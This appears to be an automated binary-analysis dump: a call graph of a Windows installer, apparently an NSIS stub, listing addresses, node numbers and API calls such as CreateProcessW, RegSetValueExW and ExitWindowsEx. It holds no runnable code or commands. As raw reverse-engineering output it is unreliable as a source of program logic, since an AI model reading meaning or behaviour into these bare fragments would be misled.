4703 40581e DestroyWindow 4684->4703 4685->4687 4686->4687 4687->4668 4687->4680 4689 405705 GetDlgItem 4688->4689 4690 405723 ShowWindow EnableWindow 4689->4690 4691 40571a 4689->4691 4713 403d85 EnableWindow 4690->4713 4691->4690 4693 40574d EnableWindow 4696 405761 4693->4696 4694 405766 GetSystemMenu EnableMenuItem SendMessageW 4695 405796 SendMessageW 4694->4695 4694->4696 4695->4696 4696->4694 4714 403d98 SendMessageW 4696->4714 4715 406009 lstrcpynW 4696->4715 4699 4057c4 lstrlenW 4700 406805 18 API calls 4699->4700 4701 4057da SetWindowTextW 4700->4701 4702 40139d 80 API calls 4701->4702 4702->4684 4704 405838 CreateDialogParamW 4703->4704 4703->4712 4705 40586b 4704->4705 4704->4712 4706 403d3f 19 API calls 4705->4706 4707 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4706->4707 4708 40139d 80 API calls 4707->4708 4709 4058bc 4708->4709 4709->4675 4710 4058c4 ShowWindow 4709->4710 4711 403daf SendMessageW 4710->4711 4711->4712 4712->4672 4712->4675 4713->4693 4714->4696 4715->4699 4716 4020f9 GetDC GetDeviceCaps 4717 401446 18 API calls 4716->4717 4718 402116 MulDiv 4717->4718 4719 401446 18 API calls 4718->4719 4720 40212c 4719->4720 4721 406805 18 API calls 4720->4721 4722 402165 CreateFontIndirectW 4721->4722 4723 4030dc 4722->4723 4724 4030e3 4723->4724 4726 405f51 wsprintfW 4723->4726 4726->4724 4727 4024fb 4728 40145c 18 API calls 4727->4728 4729 402502 4728->4729 4730 40145c 18 API calls 4729->4730 4731 40250c 4730->4731 4732 40145c 18 API calls 4731->4732 4733 402515 4732->4733 4734 40145c 18 API calls 4733->4734 4735 40251f 4734->4735 4736 40145c 18 API calls 4735->4736 4737 402529 4736->4737 4738 40253d 4737->4738 4739 40145c 18 API calls 4737->4739 4740 4062a3 11 API calls 4738->4740 4739->4738 4741 40256a CoCreateInstance 4740->4741 4742 40258c 4741->4742 4743 40497c GetDlgItem GetDlgItem 4744 4049d2 7 API calls 4743->4744 4749 404bea 4743->4749 4745 404a76 DeleteObject 4744->4745 4746 404a6a SendMessageW 4744->4746 4747 404a81 4745->4747 4746->4745 4750 404ab8 4747->4750 4752 406805 18 API calls 4747->4752 4748 404ccf 4751 404d74 4748->4751 4756 404bdd 4748->4756 4761 404d1e SendMessageW 4748->4761 4749->4748 4759 40484e 5 API calls 4749->4759 4772 404c5a 4749->4772 4755 403d3f 19 API calls 4750->4755 4753 404d89 4751->4753 4754 404d7d SendMessageW 4751->4754 4758 404a9a SendMessageW SendMessageW 4752->4758 4763 404da2 4753->4763 4764 404d9b ImageList_Destroy 4753->4764 4774 404db2 4753->4774 4754->4753 4760 404acc 4755->4760 4762 403dca 8 API calls 4756->4762 4757 404cc1 SendMessageW 4757->4748 4758->4747 4759->4772 4765 403d3f 19 API calls 4760->4765 4761->4756 4767 404d33 SendMessageW 4761->4767 4768 404f6b 4762->4768 4769 404dab GlobalFree 4763->4769 4763->4774 4764->4763 4770 404add 4765->4770 4766 404f1c 4766->4756 4775 404f31 ShowWindow GetDlgItem ShowWindow 4766->4775 4771 404d46 4767->4771 4769->4774 4773 404baa GetWindowLongW SetWindowLongW 4770->4773 4782 404ba4 4770->4782 4785 404b39 SendMessageW 4770->4785 4786 404b67 SendMessageW 4770->4786 4787 404b7b SendMessageW 4770->4787 4781 404d57 SendMessageW 4771->4781 4772->4748 4772->4757 4776 404bc4 4773->4776 4774->4766 4777 404de4 4774->4777 4780 40141d 80 API calls 4774->4780 4775->4756 4778 404be2 4776->4778 4779 404bca ShowWindow 4776->4779 4790 404e12 SendMessageW 4777->4790 4793 404e28 4777->4793 4795 403d98 SendMessageW 4778->4795 4794 403d98 SendMessageW 4779->4794 4780->4777 4781->4751 4782->4773 4782->4776 4785->4770 4786->4770 4787->4770 4788 404ef3 InvalidateRect 4788->4766 4789 404f09 4788->4789 4796 4043ad 4789->4796 4790->4793 4792 404ea1 SendMessageW SendMessageW 4792->4793 4793->4788 4793->4792 4794->4756 4795->4749 4797 4043cd 4796->4797 4798 406805 18 API calls 4797->4798 4799 40440d 4798->4799 4800 406805 18 API calls 4799->4800 4801 404418 4800->4801 4802 406805 18 API calls 4801->4802 4803 404428 lstrlenW wsprintfW SetDlgItemTextW 4802->4803 4803->4766 4804 4026fc 4805 401ee4 4804->4805 4807 402708 4804->4807 4805->4804 4806 406805 18 API calls 4805->4806 4806->4805 4103 4019fd 4104 40145c 18 API calls 4103->4104 4105 401a04 4104->4105 4106 405e7f 2 API calls 4105->4106 4107 401a0b 4106->4107 4808 4022fd 4809 40145c 18 API calls 4808->4809 4810 402304 GetFileVersionInfoSizeW 4809->4810 4811 40232b GlobalAlloc 4810->4811 4815 4030e3 4810->4815 4812 40233f GetFileVersionInfoW 4811->4812 4811->4815 4813 402350 VerQueryValueW 4812->4813 4814 402381 GlobalFree 4812->4814 4813->4814 4817 402369 4813->4817 4814->4815 4821 405f51 wsprintfW 4817->4821 4819 402375 4822 405f51 wsprintfW 4819->4822 4821->4819 4822->4814 4823 402afd 4824 40145c 18 API calls 4823->4824 4825 402b04 4824->4825 4830 405e50 GetFileAttributesW CreateFileW 4825->4830 4827 402b10 4828 4030e3 4827->4828 4831 405f51 wsprintfW 4827->4831 4830->4827 4831->4828 4832 4029ff 4833 401553 19 API calls 4832->4833 4834 402a09 4833->4834 4835 40145c 18 API calls 4834->4835 4836 402a12 4835->4836 4837 402a1f RegQueryValueExW 4836->4837 4839 401a13 4836->4839 4838 402a3f 4837->4838 4842 402a45 4837->4842 4838->4842 4843 405f51 wsprintfW 4838->4843 4841 4029e4 RegCloseKey 4841->4839 4842->4839 4842->4841 4843->4842 4844 401000 4845 401037 BeginPaint GetClientRect 4844->4845 4846 40100c DefWindowProcW 4844->4846 4848 4010fc 4845->4848 4849 401182 4846->4849 4850 401073 CreateBrushIndirect FillRect DeleteObject 4848->4850 4851 401105 4848->4851 4850->4848 4852 401170 EndPaint 4851->4852 4853 40110b CreateFontIndirectW 4851->4853 4852->4849 4853->4852 4854 40111b 6 API calls 4853->4854 4854->4852 4855 401f80 4856 401446 18 API calls 4855->4856 4857 401f88 4856->4857 4858 401446 18 API calls 4857->4858 4859 401f93 4858->4859 4860 401fa3 4859->4860 4861 40145c 18 API calls 4859->4861 4862 401fb3 4860->4862 4863 40145c 18 API calls 4860->4863 4861->4860 4864 402006 4862->4864 4865 401fbc 4862->4865 4863->4862 4867 40145c 18 API calls 4864->4867 4866 401446 18 API calls 4865->4866 4869 401fc4 4866->4869 4868 40200d 4867->4868 4870 40145c 18 API calls 4868->4870 4871 401446 18 API calls 4869->4871 4872 402016 FindWindowExW 4870->4872 4873 401fce 4871->4873 4877 402036 4872->4877 4874 401ff6 SendMessageW 4873->4874 4875 401fd8 SendMessageTimeoutW 4873->4875 4874->4877 4875->4877 4876 4030e3 4877->4876 4879 405f51 wsprintfW 4877->4879 4879->4876 4880 402880 4881 402884 4880->4881 4882 40145c 18 API calls 4881->4882 4883 4028a7 4882->4883 4884 40145c 18 API calls 4883->4884 4885 4028b1 4884->4885 4886 4028ba RegCreateKeyExW 4885->4886 4887 4028e8 4886->4887 4894 4029ef 4886->4894 4888 402934 4887->4888 4889 40145c 18 API calls 4887->4889 4890 402963 4888->4890 4893 401446 18 API calls 4888->4893 4892 4028fc lstrlenW 4889->4892 4891 4029ae RegSetValueExW 4890->4891 4895 40337f 37 API calls 4890->4895 4898 4029c6 RegCloseKey 4891->4898 4899 4029cb 4891->4899 4896 402918 4892->4896 4897 40292a 4892->4897 4900 402947 4893->4900 4901 40297b 4895->4901 4902 4062a3 11 API calls 4896->4902 4903 4062a3 11 API calls 4897->4903 4898->4894 4904 4062a3 11 API calls 4899->4904 4905 4062a3 11 API calls 4900->4905 4911 406224 4901->4911 4907 402922 4902->4907 4903->4888 4904->4898 4905->4890 4907->4891 4910 4062a3 11 API calls 4910->4907 4912 406247 4911->4912 4913 40628a 4912->4913 4914 40625c wsprintfW 4912->4914 4915 402991 4913->4915 4916 406293 lstrcatW 4913->4916 4914->4913 4914->4914 4915->4910 4916->4915 4917 402082 4918 401446 18 API calls 4917->4918 4919 402093 SetWindowLongW 4918->4919 4920 4030e3 4919->4920 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3640 403859 3483->3640 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3491 403ae1 3647 405ca0 3491->3647 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3651 406009 lstrcpynW 3493->3651 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3652 40677e 3503->3652 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3682 406009 lstrcpynW 3509->3682 3681 406009 lstrcpynW 3510->3681 3515 403bef 3511->3515 3514 403b44 3683 406009 lstrcpynW 3514->3683 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3667 406009 lstrcpynW 3519->3667 3711 40141d 3520->3711 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3684 406805 3529->3684 3703 406c68 3529->3703 3708 405c3f CreateProcessW 3529->3708 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3714 406038 3546->3714 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3723 406722 lstrlenW CharPrevW 3549->3723 3730 405e50 GetFileAttributesW CreateFileW 3554->3730 3556 4035c7 3577 4035d7 3556->3577 3731 406009 lstrcpynW 3556->3731 3558 4035ed 3732 406751 lstrlenW 3558->3732 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3739 4032d2 3563->3739 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3773 403368 SetFilePointer 3565->3773 3750 403368 SetFilePointer 3567->3750 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3751 40337f 3571->3751 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3737 403336 ReadFile 3576->3737 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3806 405f51 wsprintfW 3585->3806 3807 405ed3 RegOpenKeyExW 3586->3807 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3797 403e95 3592->3797 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3813 403e74 3602->3813 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3614 403ac1 3605->3614 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3617 406722 3 API calls 3608->3617 3609->3608 3615 405a4d GetFileAttributesW 3609->3615 3611->3606 3618 405b6c 3612->3618 3619 405a2a 3613->3619 3668 4060e7 3614->3668 3620 405a59 3615->3620 3616 405a9c 3616->3604 3621 405a69 3617->3621 3618->3614 3624 403e95 19 API calls 3618->3624 3619->3607 3620->3608 3622 406751 2 API calls 3620->3622 3812 406009 lstrcpynW 3621->3812 3622->3608 3625 405b7d 3624->3625 3626 405b89 ShowWindow LoadLibraryW 3625->3626 3627 405c0c 3625->3627 3629 405ba8 LoadLibraryW 3626->3629 3630 405baf GetClassInfoW 3626->3630 3818 405047 OleInitialize 3627->3818 3629->3630 3631 405bc3 GetClassInfoW RegisterClassW 3630->3631 3632 405bd9 DialogBoxParamW 3630->3632 3631->3632 3634 40141d 80 API calls 3632->3634 3633 405c12 3635 405c16 3633->3635 3636 405c2e 3633->3636 3637 405c01 3634->3637 3635->3614 3639 40141d 80 API calls 3635->3639 3638 40141d 80 API calls 3636->3638 3637->3614 3638->3614 3639->3614 3641 403871 3640->3641 3642 403863 CloseHandle 3640->3642 3966 403c83 3641->3966 3642->3641 3648 405cb5 3647->3648 3649 403aef ExitProcess 3648->3649 3650 405ccb MessageBoxIndirectW 3648->3650 3650->3649 3651->3473 4023 406009 lstrcpynW 3652->4023 3654 40678f 3655 405d59 4 API calls 3654->3655 3656 406795 3655->3656 3657 406038 5 API calls 3656->3657 3664 403a97 3656->3664 3663 4067a5 3657->3663 3658 4067dd lstrlenW 3659 4067e4 3658->3659 3658->3663 3660 406722 3 API calls 3659->3660 3662 4067ea GetFileAttributesW 3660->3662 3661 4062d5 2 API calls 3661->3663 3662->3664 3663->3658 3663->3661 3663->3664 3665 406751 2 API calls 3663->3665 3664->3483 3666 406009 lstrcpynW 3664->3666 3665->3658 3666->3519 3667->3486 3669 406110 3668->3669 3670 4060f3 3668->3670 3672 406187 3669->3672 3673 40612d 3669->3673 3676 406104 3669->3676 3671 4060fd CloseHandle 3670->3671 3670->3676 3671->3676 3674 406190 lstrcatW lstrlenW WriteFile 3672->3674 3672->3676 3673->3674 3675 406136 GetFileAttributesW 3673->3675 3674->3676 4024 405e50 GetFileAttributesW CreateFileW 3675->4024 3676->3483 3678 406152 3678->3676 3679 406162 WriteFile 3678->3679 3680 40617c SetFilePointer 3678->3680 3679->3680 3680->3672 3681->3509 3682->3514 3683->3529 3697 406812 3684->3697 3685 406a7f 3686 403b6c DeleteFileW 3685->3686 4027 406009 lstrcpynW 3685->4027 3686->3527 3686->3529 3688 4068d3 GetVersion 3700 4068e0 3688->3700 3689 406a46 lstrlenW 3689->3697 3690 406805 10 API calls 3690->3689 3693 405ed3 3 API calls 3693->3700 3694 406952 GetSystemDirectoryW 3694->3700 3695 406965 GetWindowsDirectoryW 3695->3700 3696 406038 5 API calls 3696->3697 3697->3685 3697->3688 3697->3689 3697->3690 3697->3696 4025 405f51 wsprintfW 3697->4025 4026 406009 lstrcpynW 3697->4026 3698 406805 10 API calls 3698->3700 3699 4069df lstrcatW 3699->3697 3700->3693 3700->3694 3700->3695 3700->3697 3700->3698 3700->3699 3701 406999 SHGetSpecialFolderLocation 3700->3701 3701->3700 3702 4069b1 SHGetPathFromIDListW CoTaskMemFree 3701->3702 3702->3700 3704 4062fc 3 API calls 3703->3704 3705 406c6f 3704->3705 3707 406c90 3705->3707 4028 406a99 lstrcpyW 3705->4028 3707->3529 3709 405c7a 3708->3709 3710 405c6e CloseHandle 3708->3710 3709->3529 3710->3709 3712 40139d 80 API calls 3711->3712 3713 401432 3712->3713 3713->3495 3720 406045 3714->3720 3715 4060bb 3716 4060c1 CharPrevW 3715->3716 3718 4060e1 3715->3718 3716->3715 3717 4060ae CharNextW 3717->3715 3717->3720 3718->3549 3719 405d06 CharNextW 3719->3720 3720->3715 3720->3717 3720->3719 3721 40609a CharNextW 3720->3721 3722 4060a9 CharNextW 3720->3722 3721->3720 3722->3717 3724 4037ea CreateDirectoryW 3723->3724 3725 40673f lstrcatW 3723->3725 3726 405e7f 3724->3726 3725->3724 3727 405e8c GetTickCount GetTempFileNameW 3726->3727 3728 405ec2 3727->3728 3729 4037fe 3727->3729 3728->3727 3728->3729 3729->3475 3730->3556 3731->3558 3733 406760 3732->3733 3734 4035f3 3733->3734 3735 406766 CharPrevW 3733->3735 3736 406009 lstrcpynW 3734->3736 3735->3733 3735->3734 3736->3562 3738 403357 3737->3738 3738->3576 3740 4032f3 3739->3740 3741 4032db 3739->3741 3744 403303 GetTickCount 3740->3744 3745 4032fb 3740->3745 3742 4032e4 DestroyWindow 3741->3742 3743 4032eb 3741->3743 3742->3743 3743->3565 3747 403311 CreateDialogParamW ShowWindow 3744->3747 3748 403334 3744->3748 3774 406332 3745->3774 3747->3748 3748->3565 3750->3571 3753 403398 3751->3753 3752 4033c3 3755 403336 ReadFile 3752->3755 3753->3752 3785 403368 SetFilePointer 3753->3785 3756 4033ce 3755->3756 3757 4033e7 GetTickCount 3756->3757 3758 403518 3756->3758 3760 4033d2 3756->3760 3770 4033fa 3757->3770 3759 40351c 3758->3759 3764 403540 3758->3764 3761 403336 ReadFile 3759->3761 3760->3580 3761->3760 3762 403336 ReadFile 3762->3764 3763 403336 ReadFile 3763->3770 3764->3760 3764->3762 3765 40355f WriteFile 3764->3765 3765->3760 3766 403574 3765->3766 3766->3760 3766->3764 3768 40345c GetTickCount 3768->3770 3769 403485 MulDiv wsprintfW 3786 404f72 3769->3786 3770->3760 3770->3763 3770->3768 3770->3769 3772 4034c9 WriteFile 3770->3772 3778 407312 3770->3778 3772->3760 3772->3770 3773->3572 3775 40634f PeekMessageW 3774->3775 3776 406345 DispatchMessageW 3775->3776 3777 403301 3775->3777 3776->3775 3777->3565 3779 407332 3778->3779 3780 40733a 3778->3780 3779->3770 3780->3779 3781 4073c2 GlobalFree 3780->3781 3782 4073cb GlobalAlloc 3780->3782 3783 407443 GlobalAlloc 3780->3783 3784 40743a GlobalFree 3780->3784 3781->3782 3782->3779 3782->3780 3783->3779 3783->3780 3784->3783 3785->3752 3787 404f8b 3786->3787 3796 40502f 3786->3796 3788 404fa9 lstrlenW 3787->3788 3789 406805 18 API calls 3787->3789 3790 404fd2 3788->3790 3791 404fb7 lstrlenW 3788->3791 3789->3788 3793 404fe5 3790->3793 3794 404fd8 SetWindowTextW 3790->3794 3792 404fc9 lstrcatW 3791->3792 3791->3796 3792->3790 3795 404feb SendMessageW SendMessageW SendMessageW 3793->3795 3793->3796 3794->3793 3795->3796 3796->3770 3798 403ea9 3797->3798 3826 405f51 wsprintfW 3798->3826 3800 403f1d 3801 406805 18 API calls 3800->3801 3802 403f29 SetWindowTextW 3801->3802 3804 403f44 3802->3804 3803 403f5f 3803->3595 3804->3803 3805 406805 18 API calls 3804->3805 3805->3804 3806->3592 3808 405f07 RegQueryValueExW 3807->3808 3809 405989 3807->3809 3810 405f29 RegCloseKey 3808->3810 3809->3590 3809->3591 3810->3809 3812->3597 3827 406009 lstrcpynW 3813->3827 3815 403e88 3816 406722 3 API calls 3815->3816 3817 403e8e lstrcatW 3816->3817 3817->3616 3828 403daf 3818->3828 3820 40506a 3823 4062a3 11 API calls 3820->3823 3825 405095 3820->3825 3831 40139d 3820->3831 3821 403daf SendMessageW 3822 4050a5 OleUninitialize 3821->3822 3822->3633 3823->3820 3825->3821 3826->3800 3827->3815 3829 403dc7 3828->3829 3830 403db8 SendMessageW 3828->3830 3829->3820 3830->3829 3834 4013a4 3831->3834 3832 401410 3832->3820 3834->3832 3835 4013dd MulDiv SendMessageW 3834->3835 3836 4015a0 3834->3836 3835->3834 3837 4015fa 3836->3837 3916 40160c 3836->3916 3838 401601 3837->3838 3839 401742 3837->3839 3840 401962 3837->3840 3841 4019ca 3837->3841 3842 40176e 3837->3842 3843 401650 3837->3843 3844 4017b1 3837->3844 3845 401672 3837->3845 3846 401693 3837->3846 3847 401616 3837->3847 3848 4016d6 3837->3848 3849 401736 3837->3849 3850 401897 3837->3850 3851 4018db 3837->3851 3852 40163c 3837->3852 3853 4016bd 3837->3853 3837->3916 3866 4062a3 11 API calls 3838->3866 3858 401751 ShowWindow 3839->3858 3859 401758 3839->3859 3863 40145c 18 API calls 3840->3863 3856 40145c 18 API calls 3841->3856 3860 40145c 18 API calls 3842->3860 3943 4062a3 lstrlenW wvsprintfW 3843->3943 3949 40145c 3844->3949 3861 40145c 18 API calls 3845->3861 3946 401446 3846->3946 3855 40145c 18 API calls 3847->3855 3872 401446 18 API calls 3848->3872 3848->3916 3849->3916 3965 405f51 wsprintfW 3849->3965 3862 40145c 18 API calls 3850->3862 3867 40145c 18 API calls 3851->3867 3857 401647 PostQuitMessage 3852->3857 3852->3916 3854 4062a3 11 API calls 3853->3854 3869 4016c7 SetForegroundWindow 3854->3869 3870 40161c 3855->3870 3871 4019d1 SearchPathW 3856->3871 3857->3916 3858->3859 3873 401765 ShowWindow 3859->3873 3859->3916 3874 401775 3860->3874 3875 401678 3861->3875 3876 40189d 3862->3876 3877 401968 GetFullPathNameW 3863->3877 3866->3916 3868 4018e2 3867->3868 3880 40145c 18 API calls 3868->3880 3869->3916 3881 4062a3 11 API calls 3870->3881 3871->3916 3872->3916 3873->3916 3884 4062a3 11 API calls 3874->3884 3885 4062a3 11 API calls 3875->3885 3961 4062d5 FindFirstFileW 3876->3961 3887 40197f 3877->3887 3929 4019a1 3877->3929 3879 40169a 3889 4062a3 11 API calls 3879->3889 3890 4018eb 3880->3890 3891 401627 3881->3891 3893 401785 SetFileAttributesW 3884->3893 3894 401683 3885->3894 3911 4062d5 2 API calls 3887->3911 3887->3929 3888 4062a3 11 API calls 3896 4017c9 3888->3896 3897 4016a7 Sleep 3889->3897 3899 40145c 18 API calls 3890->3899 3900 404f72 25 API calls 3891->3900 3902 40179a 3893->3902 3893->3916 3909 404f72 25 API calls 3894->3909 3954 405d59 CharNextW CharNextW 3896->3954 3897->3916 3898 4019b8 GetShortPathNameW 3898->3916 3907 4018f5 3899->3907 3900->3916 3901 40139d 65 API calls 3901->3916 3908 4062a3 11 API calls 3902->3908 3903 4018c2 3912 4062a3 11 API calls 3903->3912 3904 4018a9 3910 4062a3 11 API calls 3904->3910 3914 4062a3 11 API calls 3907->3914 3908->3916 3909->3916 3910->3916 3915 401991 3911->3915 3912->3916 3913 4017d4 3917 401864 3913->3917 3920 405d06 CharNextW 3913->3920 3938 4062a3 11 API calls 3913->3938 3918 401902 MoveFileW 3914->3918 3915->3929 3964 406009 lstrcpynW 3915->3964 3916->3834 3917->3894 3919 40186e 3917->3919 3921 401912 3918->3921 3922 40191e 3918->3922 3923 404f72 25 API calls 3919->3923 3925 4017e6 CreateDirectoryW 3920->3925 3921->3894 3927 401942 3922->3927 3932 4062d5 2 API calls 3922->3932 3928 401875 3923->3928 3925->3913 3926 4017fe GetLastError 3925->3926 3930 401827 GetFileAttributesW 3926->3930 3931 40180b GetLastError 3926->3931 3937 4062a3 11 API calls 3927->3937 3960 406009 lstrcpynW 3928->3960 3929->3898 3929->3916 3930->3913 3934 4062a3 11 API calls 3931->3934 3935 401929 3932->3935 3934->3913 3935->3927 3940 406c68 42 API calls 3935->3940 3936 401882 SetCurrentDirectoryW 3936->3916 3939 40195c 3937->3939 3938->3913 3939->3916 3941 401936 3940->3941 3942 404f72 25 API calls 3941->3942 3942->3927 3944 4060e7 9 API calls 3943->3944 3945 401664 3944->3945 3945->3901 3947 406805 18 API calls 3946->3947 3948 401455 3947->3948 3948->3879 3950 406805 18 API calls 3949->3950 3951 401488 3950->3951 3952 401497 3951->3952 3953 406038 5 API calls 3951->3953 3952->3888 3953->3952 3955 405d76 3954->3955 3956 405d88 3954->3956 3955->3956 3957 405d83 CharNextW 3955->3957 3958 405dac 3956->3958 3959 405d06 CharNextW 3956->3959 3957->3958 3958->3913 3959->3956 3960->3936 3962 4018a5 3961->3962 3963 4062eb FindClose 3961->3963 3962->3903 3962->3904 3963->3962 3964->3929 3965->3916 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 CoUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 3974->4018 3981 4062d5 2 API calls 3975->3981 4003 406e58 3975->4003 3975->4014 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3654 4024->3678 4025->3697 4026->3697 4027->3686 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3707 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 4036->4038 4037->4029 4037->4032 4039 406805 18 API calls 4038->4039 4040 406b69 4039->4040 4055 405e50 GetFileAttributesW CreateFileW 4040->4055 4042 406b76 4042->4032 4043 406b83 GetFileSize GlobalAlloc 4042->4043 4044 406ba4 ReadFile 4043->4044 4045 406c58 CloseHandle 4043->4045 4044->4045 4046 406bbe 4044->4046 4045->4032 4046->4045 4056 405db6 lstrlenA 4046->4056 4049 406bd7 lstrcpyA 4052 406bf9 4049->4052 4050 406beb 4051 405db6 4 API calls 4050->4051 4051->4052 4053 406c30 SetFilePointer WriteFile GlobalFree 4052->4053 4053->4045 4054->4035 4055->4042 4057 405df7 lstrlenA 4056->4057 4058 405dd0 lstrcmpiA 4057->4058 4059 405dff 4057->4059 4058->4059 4060 405dee CharNextA 4058->4060 4059->4049 4059->4050 4060->4057 4921 402a84 4922 401553 19 API calls 4921->4922 4923 402a8e 4922->4923 4924 401446 18 API calls 4923->4924 4925 402a98 4924->4925 4926 401a13 4925->4926 4927 402ab2 RegEnumKeyW 4925->4927 4928 402abe RegEnumValueW 4925->4928 4929 402a7e 4927->4929 4928->4926 4928->4929 4929->4926 4930 4029e4 RegCloseKey 4929->4930 4930->4926 4931 402c8a 4932 402ca2 4931->4932 4933 402c8f 4931->4933 4935 40145c 18 API calls 4932->4935 4934 401446 18 API calls 4933->4934 4937 402c97 4934->4937 4936 402ca9 lstrlenW 4935->4936 4936->4937 4938 402ccb WriteFile 4937->4938 4939 401a13 4937->4939 4938->4939 4940 40400d 4941 40406a 4940->4941 4942 40401a lstrcpynA lstrlenA 4940->4942 4942->4941 4943 40404b 4942->4943 4943->4941 4944 404057 GlobalFree 4943->4944 4944->4941 4945 401d8e 4946 40145c 18 API calls 4945->4946 4947 401d95 ExpandEnvironmentStringsW 4946->4947 4948 401da8 4947->4948 4950 401db9 4947->4950 4949 401dad lstrcmpW 4948->4949 4948->4950 4949->4950 4951 401e0f 4952 401446 18 API calls 4951->4952 4953 401e17 4952->4953 4954 401446 18 API calls 4953->4954 4955 401e21 4954->4955 4956 4030e3 4955->4956 4958 405f51 wsprintfW 4955->4958 4958->4956 4959 402392 4960 40145c 18 API calls 4959->4960 4961 402399 4960->4961 4964 4071f8 4961->4964 4965 406ed2 25 API calls 4964->4965 4966 407218 4965->4966 4967 407222 lstrcpynW 